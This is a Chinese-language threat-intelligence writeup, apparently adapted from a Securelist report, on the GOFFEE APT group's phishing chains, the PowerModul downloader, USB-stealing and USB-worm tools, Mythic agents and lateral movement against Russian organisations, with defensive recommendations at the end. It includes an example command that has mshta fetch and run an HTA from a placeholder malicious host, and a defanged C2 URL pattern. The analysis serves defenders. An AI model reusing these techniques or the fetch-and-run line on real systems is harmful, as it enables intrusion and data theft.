数据来源:GOFFEE’s recent attacks: new tools and techniques | Securelist (2025年4月10日)
一、事件概述:GOFFEE 的持续演进
自2022年首次被发现以来,GOFFEE 一直是一个高度专注于俄罗斯境内目标的高级持续性威胁(APT)组织。其攻击对象涵盖媒体、电信、政府、建筑和能源行业,具有明确的地缘政治指向性。
在2024年至2025年的最新攻击活动中,GOFFEE 展现出显著的技术演进:
- 从早期依赖篡改系统文件(如 explorer.exe),
- 到如今全面转向基于 PowerShell 的模块化攻击链,
- 并引入了一款名为 PowerModul 的新型 PowerShell 下载器,
- 同时逐步用二进制版 Mythic 代理取代原有的 PowerShell 植入物。
这一系列变化表明,GOFFEE 正在构建一个更灵活、更隐蔽、更易扩展的攻击框架,其战术成熟度已达到国家级APT水平。
二、初始入侵:双路径钓鱼策略
GOFFEE 的初始感染仍以鱼叉式钓鱼邮件为主,但已发展出两种并行的技术路径,显示出其攻击基础设施的多样性。
🔹 路径一:伪装成文档的“补丁化系统文件”
攻击者发送一个 RAR 压缩包,内含一个名为 document.pdf.exe 或 report.doc.exe 的可执行文件。
该文件实为合法的 Windows 系统程序(如 explorer.exe 或 xpsrchvw.exe),但其代码已被打补丁注入恶意 shellcode。
- 用户运行后,会下载一个看似正常的文档作为诱饵,掩盖恶意行为;
- 同时,注入的 shellcode 会立即激活一个Obfuscated PowerShell 版 Mythic 代理(PowerTaskel),与C2建立连接。
📌 攻击逻辑:
利用用户对“系统文件”的信任,绕过基础杀毒软件检测。由于文件哈希与原始系统文件接近,传统IOC检测难以奏效。
🔹 路径二:宏文档 + HTA + PowerShell 多层加载(2024年新策略)
这是 GOFFEE 在2024年引入的全新攻击链,技术更为复杂。
- 恶意 Word 文档包含一个 VBA 宏,打开时提示:“此文档由旧版 Office 创建,请点击‘启用内容’以正确显示”;
- 用户点击后,宏执行以下操作:
- 恢复文档内容(伪装成正常文件);
- 在当前目录创建两个文件:
UserCache.ini.hta和UserCache.ini; - 将 HTA 路径写入注册表
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows的LOAD键,实现持久化自启。
- HTA 文件通过
cmd.exe+echo输出一个 JavaScript 文件(UserCacheHelper.lnk.js),再由该脚本启动 PowerShell 植入物 PowerModul。
⚠️ 技术亮点:
整个过程不直接调用 PowerShell,规避了常见的 PowerShell 审计策略,属于典型的“Living-off-the-Land”(白利用)攻击。
三、核心组件:PowerModul——新型 PowerShell 下载器
什么是 PowerModul?
PowerModul 是 GOFFEE 在2024年引入的一款轻量级 PowerShell 下载器(6.66KB),我们将其视为一个独立的恶意软件家族,而非 PowerTaskel 的附属组件。
主要功能:
- 连接C2服务器,接收并执行远程下发的 PowerShell 脚本;
- 支持多种载荷:PowerTaskel、FlashFileGrabber、USB Worm;
- 使用唯一通信协议,与 PowerTaskel 分离,增强隐蔽性。
通信机制:
- C2地址格式:
hxxp://62.113.114[.]117/api/texts/{计算机名}_{用户名}_{磁盘序列号} - 响应为 XML 格式,包含 Base64 编码的脚本模块;
- 支持任务调度(
<Interval>和<CountRuns>字段)。
独特功能:OfflineWorker()
- 内置一个名为
OfflineWorker()的函数,可解码并执行预定义的 Base64 字符串; - 在某些样本中,该字符串包含 FlashFileGrabber 数据窃取工具,用于在无网络时执行本地任务;
- 表明 GOFFEE 具备“离线作业”能力,适应断网环境。
四、攻击载荷:三大 PowerShell 工具链
1. FlashFileGrabber:U盘文件窃取器
专用于窃取插入受害机的U盘或移动硬盘中的敏感文件。
- 扫描所有可移动设备;
- 复制特定扩展名的文件至
%TEMP%\CacheStore\connect\<卷序列号>\; - 创建
ftree.db记录文件元数据,避免重复拷贝; - 使用
internal_profiles.db记录已处理文件的 MD5,实现去重。
📌 目标文件类型:
涵盖办公文档(.doc/.xlsx)、工程文件(.dwg)、数据库(.mdb)、配置文件(.ovpn)等高价值数据。
🔍 与 FlashFileGrabberOffline 的区别:后者仅本地存储,而 FlashFileGrabber 可将文件上传至C2。
2. USB Worm:U盘传播蠕虫
GOFFEE 不仅窃取U盘数据,还会将U盘变成攻击跳板。
传播机制:
- 将U盘上的文件重命名为随机名(如
zermndzg.docx),并隐藏; - 复制
UserCache.ini(PowerModul)到U盘; - 创建
.bat和.vbs脚本,用于静默运行 PowerModul; - 创建快捷方式(.lnk),图标伪装成原始文件类型(如Word图标);
- 用户点击“快捷方式”时,实际执行
.vbs→.bat→PowerShell→ 植入新主机。
📌 社会工程设计精巧:
用户以为打开了原文件,实则触发了恶意链,极具欺骗性。
3. PowerTaskel:Mythic 框架的 PowerShell 实现
PowerTaskel 是 GOFFEE 自2023年起使用的主力后门,本质是 Mythic C2 框架的 PowerShell 版本。
核心能力:
- 向C2发送“心跳”(checkin);
- 接收并执行远程命令或PowerShell脚本;
- 支持文件上传/下载、进程执行、注册表操作等。
通信特点:
- 请求体为 XML 序列化的 PowerShell 对象;
- 使用 单字节 XOR 加密 + Base64 编码;
- 极可能源自开源项目 Medusa Mythic Agent(Python版)。
📌 战术演进:
PowerTaskel 已不仅是独立后门,更成为加载二进制版 Mythic 代理的“跳板”,实现权限提升和横向移动。
五、横向移动:从 PowerShell 到二进制代理
GOFFEE 的横向移动策略体现了其从脚本化向专业化过渡的趋势。
1. 权限提升:利用 PsExec 实现 SYSTEM 权限
- PowerTaskel 下载 Sysinternals PsExec 工具(重命名为
ntuser.exe或1cv9.exe); - 通过 PsExec 以 SYSTEM 权限启动
mshta.exe,并传入恶意 HTA URL; - HTA 中的 JScript 创建临时文件,最终加载 PowerTaskel 或新载荷,实现提权。
2. 网络横向移动:WinRM + HTA 注入
一旦获得高权限,GOFFEE 开始在内网扩散:
- 使用 WinRM(Windows Remote Management)服务远程执行命令;
- 目标主机上通过
wmiprvse.exe或wsmprovhost.exe启动mshta.exe,加载攻击者控制的 HTA; - HTA 再次触发 PowerModul 或二进制版 Mythic 代理,完成横向渗透。
# 典型攻击链示例:
wmiprvse.exe -> cmd.exe /C mshta.exe http://malicious[.]com/payload.hta3. 转向二进制 Mythic 代理(关键演进)
GOFFEE 正在逐步弃用 PowerTaskel,转而使用自研的二进制版 Mythic 代理。
技术实现:
- PowerTaskel 从C2下载一段自配置 shellcode;
- 通过辅助 DLL 将 shellcode 注入内存;
- shellcode 解密并加载二进制代理,实现更稳定的远程控制。
HTA Polyglot 技术:
- C2返回的 HTA 文件是一个多格式文件(Polyglot):
- 前80%为 shellcode;
- 中间为两个 Base64 编码的 PowerShell 脚本;
- 结尾为 HTA 结构;
mshta.exe解析时执行 JScript,逐步提取并执行各层载荷。
📌 目的:规避 EDR 对 PowerShell 的监控,转向更难检测的内存执行模式。
六、受害者画像与攻击动机
✅ 受害者特征:
- 地理位置:全部位于俄罗斯;
- 行业分布:媒体、电信、政府、建筑、能源;
- 语言环境:钓鱼邮件、文档均为俄语,针对性极强。
🔍 攻击动机推测:
- 情报收集:针对政府和能源企业,可能涉及战略情报;
- 供应链渗透:建筑与工程公司常参与国家项目,具备高价值数据;
- 长期潜伏:攻击模式强调隐蔽与持久,非短期破坏。
七、趋势洞察:GOFFEE 的三大演进方向
| 演进方向 | 具体表现 |
| 从二进制到脚本化 | 放弃自研恶意软件,转向 PowerShell + HTA + VBA 的“白利用”组合 |
| 从单一到模块化 | PowerModul 作为下载器,可动态加载多种功能模块,灵活应对不同场景 |
| 从脚本到混合执行 | 最终回归二进制代理,结合脚本的灵活性与二进制的稳定性 |
这种“先用脚本绕过检测,再用二进制实现持久控制”的策略,已成为现代APT的标准范式。
八、防御建议
✅ 企业应采取的措施:
| 禁用 Office 宏 | 尤其是来自外部邮件的文档 |
| 监控注册表 LOAD 键 | 检测HKCU\...\Windows\LOAD的异常写入 |
| 限制 mshta.exe 和 cscript.exe | 通过 AppLocker 或 Intune 策略控制其使用 |
| 审计 PowerShell 行为 | 启用脚本块日志(Script Block Logging)和模块日志 |
| 关闭 WinRM 外部访问 | 除非必要,否则禁用 WinRM 服务 |
| 加强U盘使用管理 | 禁止自动运行,限制可移动设备权限 |
✅ 个人用户建议:
- 不打开来源不明的
.doc或.pdf.exe文件; - 更新系统和 Office 补丁;
- 使用可靠的安全软件。
九、结语
GOFFEE 的攻击模式告诉我们:
今天的 APT,早已不是“高级病毒”,而是“高级工程”。
它不依赖0day漏洞,而是通过精心设计的脚本链、合法工具滥用、注册表持久化和U盘传播,构建出一条条难以察觉的攻击路径。其背后,是一个具备软件工程能力、C2框架开发经验和地缘情报支持的成熟攻击组织。
面对这类威胁,我们必须从“查杀病毒”转向“监控行为、理解战术、预测路径”的主动防御体系。唯有如此,才能在这场无声的网络战争中,守住我们的数字边疆。